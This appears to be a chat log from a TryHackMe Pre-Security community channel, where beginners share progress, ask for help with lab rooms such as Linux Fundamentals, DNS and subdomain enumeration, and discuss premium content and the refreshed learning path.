Will be a privilege to learn more from you time to time
i will do my best to help but im no guru haha
41 day streak
About to finish web module 3 tommorow and start the linux module
been a bit busy due to both school and work, but im still at it
@austere solar how aboout you
Awesome! π
haha i been slacking
Great job , keep it up π π
Just finished the Pre-Security pathway! I went on and off on it because of school, but the patience was really worth it.
I unfortunately can't find my certificate, so here are these screenshots:
Yeahhh, that's awesome! I'm rootin' for you!
Great job , keep up the good work π π
Hello, im working on a room Jr Penetration Texter/ Introduction to web hacking > Subdomain Enumeration task 2 : In opening the https://crt.sh/ I keep hitting a bad Gateway Error 502. Sometimes ill get in and the make the search and get the error again
@keen bridge For me, https://crt.sh/?q=tryhackme.com just works. Are you directly browsing to it or going via a proxy?
Free CT Log Certificate Search Tool from Sectigo (formerly Comodo CA)
im using the attack box within the module. but i did try it in my own browser and got the same thing..
ill go try it again right now since you said it worked for you ..see whaqt happens
I've tried it with 3 different browsers now and it works everytime π€·ββοΈ
yes it worked now. yesterday and this morning i kept getting that bad gateway ..but its working now and i was able to complete that module..thank you for the help
i was gonna do web debugging(red team) but i might focus more on the blue/purple team
Nice. Im one the same path blue teaming, focusing on that SAL1 certification for now. I got a long way to reach it, but hopefully within the early months of 2026. I gotta grind for this.
how do i know if i understand everything correctly?
you test it out or you can google it
google it?
so give me an example of something you dont understand or you want to understand
like here is an example
linux command, i would google command and see how an example works if i don't understand the example from the manual page
i ment: how do i test if i understand everything correctly
Be scientific. Make predictions based on your understanding, and if your predictions are wrong, then you don't understand correctly
you can built your own homelabs
i like that!
@shrewd ether look up how to build a homelab. it will help you to put what you learns in practices or your theory to the tests.
that sounds alright, ill look into it
here is an example of all my vms i have build
can i dm you?
sure
@minor niche im back to the grind. new year, new me! im at web application basics
Hell yeah bro, letβs do this
anyone know the answer forv" What groups is this user a member of?

Well done πβ
hey hope everyone is have n a great start to ur new year
im new here in this space wanting to learn
@austere solar long time no see man, how are you doing ?
im doing alright man... college start next week. and getting back to the grind. how about yourself??
Ver ywell thanks ! I was on holiday for 2 weeks and I totally disconnected from it all, THM and cybersec in general, it makes us feel good to breath sometimes π
Gave +1 Rep to @austere solar (current: #1033 - 6)
yeah i was off for like 3 weeks.
i didn't want to rush and want to enjoy my last meaningful life(playing video games) before i get trap
I was helping someone with metasploit and starting to understand more. there were things i didn't realized or firgure out later
where do i start
Same for me no worries haha, i played video games during two weeks
hi guys
hi
do you think its alright to do other modules even tho you havent completed pre security yet?
I'd prefer you to finish what you started and then move onto other stuff
Hi Iβm in pre security. How long will it take to load a new virtual machine environment , once the first one has expired?
Mostly a minute
I'm confuse between offensive role or defensive role which is good for me?
It is normal to feel that way, many roles have similar elements. If you have not already done so go through the roles in cyber security (https://tryhackme.com/room/careersincyber), and do the quiz at the end of the room a few times and honestly. This will help you find a starting direction. You can always change direction and/or roles later on as you discover your strengths and weaknesses. The more you do the more you will learn your natural role in cyber security.
hey guys a breif introduction about myself.......i know few linux commands and love to fail and learn......its been really addictive to just break my linux system and fixing it spending hours ......i have a huge intreest in linux......considereing i know nothing about networking and linux and tools and bug bounty .....can someone guide me so that i can start bug bounty starting from scratch and also share resources if possible....
hi guys! looking for study mates for biginners! anyone there?
I would like to ask, in the chat room https://tryhackme.com/room/serversidetemplateinjection. Why the lab machine in task 8. http:ssti.thm:8080 cannot be run?
I do not think this is part of the Pre-Security pathway?
Oh sorry, I went to the wrong room.
No worries!
can you direct me to which room I should be in?
@harsh hazel hey, If you feel comfortable, I am here
@harsh hazel yes
Does the site allow you to study more than one path at a time?
Hi
Ofc?
Ofc = Of course
Yes, but you can only "enroll" to one path at a time. At least from my experience.
So you will only see stats from the enrolled path on your dashboard. But you can freely click into another path and do the rooms.
most of the rooms in pre-security are premium, and not free.
it shouldn't be so, at least give beginners a full experience, and then decide what their taste is, and decide which room to subscribe to or what not.
can someone explain to me why we have to use remmina while we can just connect using the ssh command in the terminal?
My exact opinion. I do not want to sound ungrateful but what do you mean that 4/5 of the network part is premium ? Like this way I fear that IMPORTANT stuff are not accessible just because I do not pay.
my bro!
I dig you, and I heard it was not like that from the start....
in the early days most of the rooms were free, but now that cybersecurity seems to have taken the spot lights and has been endowed with economic value, everything is being price-tagged.
infra is expensive
in the early days, they focus on acquiring a user base and operate at loss but eventually need to start making some profit
but what sucks is how some rooms do not work and are not being fixed
Hey is this the right place to also ask for room help in the pre-security path?
or should i just go to #room-help for that?
And can I ask general questions related to or inspired by information provided in the room here?
What are you stuck on dude? Iβve virtually just finished that path!
On the very first one, offensive security intro, task 4, it tells me to go a certain web page, but it gives a 404 response
oh nvm, it works now!
it sometimes resets my progress on that room only
and then some tasks look different idk
sorry!
Now I am at the Linux fundamentals part. I LOVED THE FIRST PART so much, gave a really good review on that room, thought something like 'I love how this is free and how well it is structured and easy' and then when I click part 2 they smash it into my face.
I understand they need profit. IT would be very nice if more (especially basic) rooms would be accesible. I WOULD NOT care if there would be adds for non premium user or something. Just let me learn slightly more π₯Ή
No problem dude! Sorry for slow reply, glad you figured it out! π
yh, I feel you bro.
and I understand the excitement, I once felt it too, I still do btw..
but ig, that's what they want...yk they must be like "if you really want it, come get it!", you feel me?...if you really want something you'd stop at nothing to get it kind of vibes...if you know what I mean....plus thm is not a charity, they need revenue to maintain the site and all.
nevertheless, it'd be really helpful and amazing if users have access to more basic rooms...just as you have said.
Guys, who is ready we study together.
.
i am ready..but what are we studying?
you are a black hat ?
Hey in the pre-security path there a lot of "View website" options that open a split view of a static site.
Is this like a tiny VM that it opens?
How do I 'stop' it, after I have completed the task?
@vernal knot Please slow down. Further spam will result in a short timeout.
CTF Team Recruiting
Looking for self-driven people.
Beginners welcome if disciplined - no spoon-feeding. Open to everyone.
Dm For applying
there's a "-" at the bottom of the static site :). we will work on your feedback!
I have seen the "-" and I have used it.
Does that 'close' the static site or does it close the split view?
if you have more than 1 static site per room opened it closes that site. But if there's only 1 site open it also closes the split view
Ah okay thanks
Hey guys do we pass sec1 exam directly after purchasing the certificat or they give u a 6 months periode to preparer yourself
???
you do not have to pass it directly after purchasing however i do not know how many time you have to
Ok tnx

don't know where to report the problem, so hope that a staff or admin is reading this here:
In PreSecurity > Network Fundamentals > Packets & Frames > Task 5 Port 101 (Pratical) is a link to a table of the 1024 most common ports used. Unfortunately I always recieve an error 404 when trying to open it. Can pls someone check, if the link is correct or obsolet?

Today I was 4 tasks away from getting the pre-security certification then I saw 4 modules new π
that might be because of the new refreshed presecurity path we have:
you can still complete the path you're on, it should be here:
the updated one is now here
https://tryhackme.com/path/outline/presecurity
The choice is yours!
The original Pre Security path covered cyber security basics, networking, web technologies, and deep-dive Linux and Windows fundamentals. The new version is a major upgrade that starts earlier, teaching you how computers work from the inside out, and goes further with new modules on software fundamentals, introductory coding, and real-world atta...
This path teaches you how technology works from the ground up, no prior experience needed. From computer basics and your first lines of code to networking, the web, and cyber attacks and defences, this is where your cyber security journey begins.
Can anyone help me with Pre-Security Linux Fundamentals Part 2?
I am in the SSH, searched the directories and cant find this "hiddenfiles" or unknown in the home directory
I'll change this channel to pre-security-legacy and create a new one for pre-security. @cobalt flame
Whatβs the difference between the newer version of PS and Legacy ? Do I have to do the new one aswell now ?
If you almost finish or finished sec 101 then itβs ez pz
I just finished Linus fundamentals part 1 ( still confused as shit) do you reccomend so just getting through 101 and then going back ?
Linux*
No , i think in your position, go back and finish Legacy and then return to Sec101
I was atOSWAP Room and now about to finish the Legacy to mark it as complete and the extra room can be more benefit
Oh ok. Thank you. I appreciate it. Sorry one more question, is the new pre security does it have a lot more content ?
yes it does
Yooo everybody what happened, I canβt find the paths I finished ? I forgot the name but it was the very basis of pentesting, itβs not there anymore
And the pre security path that I had already completed is now only halfway doneβ¦
THM launched an updated / refreshed pre-security path recently.
Which I think now ties with SEC0
Ok thanks. I guess Iβll have to start these over then
Gave +1 Rep to @brave cobalt (current: #12 - 916)
Whatβs the exam layout like for pre security? Is it like the rooms ?
Hold on thereβs a difference between pre security and legacy ? Eh
Yeah legacy path is deprecated
Use the new one instead π
The new one is the one in the path above the exam right, sorry just double checking.
This is the new one π

What was your wait time when you sent the emails? Sending a follow up email less then 3 to 5 business days in between could have pushed your email to the back of the queue
Well, The suggestion there really will be considered because Kinda I want thm team to teach th cybersecurity legal and illegal first because Ive been from 1-2 Months And Usually I ignore but people really doesnt know diffrence b\w Legal and illegal measures I hope u get it what im trying to recommend because thm staff dedicated their time in the rooms it wont be huge problem if they do this also if possible
Kinda Ive send 1st email on jan 26 near and then I even dont get the revert like que or even automated robot message saying my que ticket or either any kind of tracking number then i tried 2 times more still then i leave it as it was
Well If u could forward my suggestion direct to the team it will be way great for all community learning there
Im requesting team to make beginner friendly module or course b4 unlocking any path to learn about legal and formalities and kinda every country has their own rules but covering up some most common rules for breaking rules and making illegal means of the education thats all i would like to recommend
Does these not cover what you have in mind -
https://tryhackme.com/room/cybergovernanceregulation
Also, as it will involve a lot of reading, I'm not certain how bite size it will be.
Thanks for youre support to share

im stuck in a HTML Injection task
View the website on this task and inject HTML so that a malicious link to http://hacker.com is shown.

Pre-Security learning path
π₯³
https://tryhackme.com/path-action/presecurity/join
This learning path will teach you the pre-requisite technical knowledge to get started in cyber security. To attack or defend any technology, you have to first learn how this technology works.
The Pre-Security learning path is a beginner friendly and fun way to learn the basics. Your cyber security learning journey starts here!
Where's the Post Security pathway?
It's on the way, but called slightly different. π₯³
I thought it was going to be a rickroll for a sec
It's the 2021 version: a learn-roll π
I'm about to. Just gotta work through the windows section after work tomorrow.
Nice π I haven't gotten there as of yet. How is the 3-part Linux fundamentals ?
I had issues with one part (task 4) but your mileage may vary
I used linux years ago (circa 2010 with Ubuntu) so some stuff was familiar.
Same here just never got into the fundamentals of it, preferred Linux due the capability of running on older hardware compare to Windows.
I completed the Pre-security path today, but for some reason cannot download the certificate. Did anyone encounter the similar issue?
I'll try to finish today and let you know
I did the cours yesterday, and No problem downloading the "paper"
Yeah my internet went out today. But I just got on and finished. Other than having to enable popups in firefox, it showed up fine once I clicked the download button
Can we finish 100 percent of this pre-security-pathway without subscribing to tryhackme at all?
thats the real deal but sadly you cant beacuse some rooms are reserve for subs.
Thanks for your reaction! Seems it had something to do with Safari. I managed to download the file in Google Chrome

I am so glad there is a dedicated channel for this path. I am in the Linux module at the moment.
yeah i need a bit of help
im hindof confused with the linux module
i dont want to cheat and just get the answers without understanding whats going wrong
had my attackbox disconnect like 2 times... not time out... disconnect. heres my issue
aw man i cant post my snipit to show the attack box commands
#start-here might be a good place to look first, sign up to the website and probably the 'pre-security' path
on the website and see how you go
Can you send me a message and see if you can attach the screenshot with it?
@timid raft yeah, i am so hooked, I am planning to buy it.
I will say buy the subscription...its worth it
If you have some IT foundations, you can probably run through the free rooms first but they're a mix from pathway to pathway (if pathways are an interest for you). If you're completely new, then signing up for a sub will give you the best sense of progression to grow.
Yup. I did, enjoying it so far!!!
subscribe is better, i have tried udemy for pen class, still tryhackme is better than then becoz you are provided machine and vul room to practice
Anyone here?
Finished the Linux module for the path. I am going to start the Windows Fundamantals. Just would like if anyone is working on this path and if they have any questions or anything that they did not understand in the first four modules. If so, please send me a message with the questions in bullet points. I will try to answer.
I knew it was bad idea to start Linux on a weekend but I had to face my fear .... On Task 4 of Linux Funamentals - we are instructed to run the whoami command to find out the User we are logged in as - however my dear terminal is displaying a totally different result and not where I got lost .... Please help !!!!
have you learned ssh command? i just dont know how to explain it. you didn't connect to a remote server so it is "root" instead of tryhackme. follow this command to connect to remote server: ssh tryhackme@ipaddress @fallen bluff
Thank you! SSH not yet covered. I will give that a go. The attackMachine is now White screen and I have restarted it anumber of times: Should I report this as a bug ?
you're welcome. Terminate all machines and restart web browser. Try again if it doesn't work you can ask to moderators. I don't know else about this.
Hey @fallen bluff so for that question you have to ssh into that machine
Ssh means "secure shell" and what you're doing is getting a shell from another computer onto yours so that you can execute commands on it
To use ssh use the following syntax
ssh [username]@[IP address of the Machine]
And enter in the password when it asks you for that π
Wow! This is super helpful! I dont recall the lab mentioning ssh . I will try this when back online. Thank you @thorn tendon

Hi, as a beginner should i start with this path way(pre-security) or the complete beginner path way?
In what order is a beginner supposed to go?
Pre-Security before Complete Beginner learning path. π
Can u tell us the exact order to proceed
After complete begginer,,which one should we go with
pre sec the beginner from what i understand
Depends, after Complete Beginner you can chose your path of choice.
When starting machin on Linux Fundamentals Part 1 i'm getting a plank page why?
the right side page is blank
Hi I got an error when I try to download the certificate attached to this room
What's the error?
« hmm. We re having trouble finding that site Β» we canβt connect to the server at tryhackme-certificate.s3-eu-west-1.amazonaws.com
Should be fixed now. π
I've learnt more in 1 week then I have this past year π awesome service
Great to hear. Enjoy the platform. π
same here
Great! Cause i'm really enjoying the courses.
I wonder how many people asked already "which part to choose first?" Same here! I notice that as further I go in learning they start to overlap. But anyway, how would you start?
I started before the path was here, but I can say that going back through it is a real good refresher
@delicate forum I will agree on that in a couple of monthsπ
Hi, i'm doing pre security/ DNS in detail task 3 what do the mean by:
A Record
These records resolve to IPv4 addresses, for example 104.26.10.229
these record resolve to
what dose that mean?
hmm hard to explain in words without using the definition, but basically it means they will be "equal to" once they are put through a test or check
hmmmm
there are a lot of different records in DNS, https://simpledns.plus/help/dns-record-types has good info on them
That i know but i'm trying to get my head around what the mean by resolve to.
basically google.com has an IP that your computer has to send traffic to
